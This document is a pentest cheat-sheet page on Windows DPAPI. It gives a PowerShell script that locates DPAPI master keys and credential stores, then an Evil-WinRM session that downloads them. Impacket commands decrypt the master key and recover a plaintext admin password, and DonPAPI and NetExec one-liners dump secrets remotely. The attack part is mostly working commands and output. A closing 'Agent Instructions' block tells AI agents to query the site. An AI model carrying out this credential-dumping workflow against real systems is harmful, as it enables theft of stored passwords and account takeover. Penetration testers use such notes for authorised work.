# DPAPI [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) The Data Protection Application Programming Interface or [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for: | Applications | Use of DPAPI | | --------------------------- | ------------------------------------------------------------------------------------------- | | `Internet Explorer` | Password form auto-completion data (username and password for saved sites). | | `Google Chrome` | Password form auto-completion data (username and password for saved sites). | | `Outlook` | Passwords for email accounts. | | `Remote Desktop Connection` | Saved credentials for connections to remote machines. | | `Credential Manager` | Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more. | ## DPAPI Discovery {% embed url="" %} ```powershell # Function to check if a directory exists and handle access errors silently function Check-Directory { param ([string]$Path) try { if (Test-Path -Path $Path -ErrorAction SilentlyContinue) { return $true } } catch { return $false } return $false } # Function to scan for DPAPI-related paths function Scan-DPAPI { $basePath = "C:\Users" # Check if base path exists if (!(Test-Path $basePath -ErrorAction SilentlyContinue)) { Write-Error "Base path $basePath does not exist!" return } # Get all user directories $userDirs = Get-ChildItem -Path $basePath -Directory -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName # List of DPAPI-related paths to check for each user $pathsToCheck = @( "\AppData\Roaming\Microsoft\Protect", # User-specific DPAPI Master Keys "\AppData\Local\Microsoft\Credentials", # Windows Credential Manager "\AppData\Roaming\Microsoft\Vault", # Credential Vault "\AppData\Local\Microsoft\Edge\User Data", # Microsoft Edge Data "\AppData\Roaming\Microsoft\Internet Explorer" # Internet Explorer Data ) # Scan each user directory foreach ($userDir in $userDirs) { Write-Host "Scanning user directory: $userDir" -ForegroundColor Cyan try { # Ensure we can access the user directory if (!(Test-Path $userDir -ErrorAction SilentlyContinue)) { Write-Warning "No permissions on directory of user: $userDir" continue } foreach ($subPath in $pathsToCheck) { $fullPath = Join-Path -Path $userDir -ChildPath $subPath if (Check-Directory -Path $fullPath) { Write-Host "Found DPAPI-related path: $fullPath" -ForegroundColor Green } } } catch { Write-Warning "No permissions on directory of user: $userDir" } } # Check system-wide DPAPI paths $systemPaths = @( "C:\Windows\System32\Microsoft\Protect" # System-Wide DPAPI Keys ) Write-Host "Scanning system-wide paths..." -ForegroundColor Yellow foreach ($sysPath in $systemPaths) { if (Check-Directory -Path $sysPath) { Write-Host "Found DPAPI-related path: $sysPath" -ForegroundColor Green } else { Write-Warning "No permissions or path not accessible: $sysPath" } } } # Run the DPAPI scan Scan-DPAPI ``` ``` .\ScanDPAPI.ps1 Scanning user directory: C:\Users\Administrator Scanning user directory: C:\Users\C.Neri Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Credentials Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Vault Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Edge\User Data Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Internet Explorer Scanning user directory: C:\Users\c.neri_adm Scanning user directory: C:\Users\Public Scanning system-wide paths... Found DPAPI-related path: C:\Windows\System32\Microsoft\Protect ``` ## Impacket ``` *Evil-WinRM* PS C:\Users\username\Documents> cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Credentials> dir -h Directory: C:\Users\username\AppData\Roaming\Microsoft\Credentials Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 6/7/2024 5:08 PM 430 C4BB96844A5C9DD45D5B6A9859252BA6 *Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> download C4BB96844A5C9DD45D5B6A9859252BA6 ``` ``` *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect> dir Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 6/7/2024 1:17 PM S-1-5-21-4024337825-2033394866-2055507597-1115 ``` ``` *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> dir -h Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 12/4/2024 2:46 AM 740 1fe00192-86ec-4689-a4f2-f8c2336edaf4 -a-hs- 6/7/2024 1:17 PM 740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -a-hs- 6/7/2024 1:17 PM 740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -a-hs- 12/4/2024 2:46 AM 24 Preferred *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b ``` User password known - If not[ bruteforce](#bruteforce-masterkey) ``` $ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password password Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [MASTERKEYFILE] Version : 2 (2) Guid : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b Flags : 0 (0) Policy : 0 (0) MasterKeyLen: 00000088 (136) BackupKeyLen: 00000068 (104) CredHistLen : 00000000 (0) DomainKeyLen: 00000174 (372) Decrypted key with User Key (MD4 protected) Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a ``` ``` $ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [CREDENTIAL] LastWritten : 2024-06-07 15:08:23 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000001 (CRED_TYPE_GENERIC) Target : LegacyGeneric:target=admin_acc Description : Unknown : Username : domain\username_adm Unknown : P4ssW0rd0312 ``` ## Bruteforce masterkey {% embed url="" %} ## Tools {% hint style="info" %} *Require Local admin privileges or DA privs* {% endhint %} ### dploot {% embed url="" %} dploot {% endembed %} ### Donpapi `exegol-CPTS /workspace # DonPAPI "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"` ### Netexec - CME {% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %} [NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md) {% endcontent-ref %} ``` nxc smb -u user -p password --dpapi ``` ``` nxc smb -u user -p password --dpapi cookies ``` ``` nxc smb -u user -p password --dpapi nosystem ``` {% embed url="" %} ### dpapidump.py {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/dpapi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.